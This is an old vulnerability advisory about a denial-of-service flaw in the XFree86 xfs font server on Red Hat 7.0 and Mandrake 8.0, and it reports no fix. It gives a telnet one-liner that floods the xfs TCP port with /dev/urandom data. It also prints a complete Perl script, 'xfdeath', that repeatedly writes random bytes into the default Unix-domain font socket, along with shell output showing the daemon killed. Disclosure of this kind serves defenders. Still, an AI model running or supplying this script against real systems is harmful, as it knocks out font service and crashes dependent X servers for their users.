COMMAND

    xfs

SYSTEMS AFFECTED

    Linux

PROBLEM

    xfs from  the package  XFree86-xfs-4.0.1-1 (i386.rpm),  RedHat 7.0
    seems to suffer from a Denial of Service attack.  To cause xfs  to
    stop responding for requests, try to do the fillowing:

        $ telnet victim xfs </dev/urandom

    Repeat about 100 (or 1000) times and you get Connection refused
    message.

    Regular  Xservers  can  no  longer  connect, usually crash stating
    Could not open default font 'fixed' and probably get disabled  for
    5 minutes if run from inittab.

    Valentine M. Smith  found this originally.   Since, this has  been
    confirmed on Mandrake 8.0 as well.

    The  TCP  attack  against  the  font  server  is  (obviously) only
    applicable to font-servers listening  to TCP.  (Which  is probably
    only the case for systems serving x-terminals.)

    If   we   want   to   kill   a   font-server   running   on    the
    Mandrake/Redhat/whatever  *default*  setup,  we  have  to send the
    garbage to the Unix-Domain socket instead.

        [user@userland ~]$ ps -ax|grep xfs
        3690 ?        S      0:00 xfs -port -1 -daemon -user xfs
        3723 pts/2    S      0:00 grep xfs
        
        [user@userland ~]$./xfdeath
        
        [user@userland ~]$ ps -ax|grep xfs
        3780 pts/1    S      0:00 grep xfs
        
        [user@userland ~]$cat xfdeath
        #!/usr/bin/perl -w
        use Socket;
        use strict;
        my ($grab, $line, $garbagebyte,$i,$STOP);
        sub darned {
        $STOP=1;
        }
        open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!";
        $SIG{'PIPE'} = 'darned';
        for ($i = 0; $i < 1000; ++$i)
        {
        $STOP=0;
        $grab = shift || '/tmp/.font-unix/fs-1';
        socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0)  || die "socket: $!";
        connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!";
        while (!$STOP) {
        read(GARBAGE, $garbagebyte, 1);
        print ".";
        print A_SOCKET $garbagebyte;
        }
        }
        exit;

SOLUTION

    Nothing yet.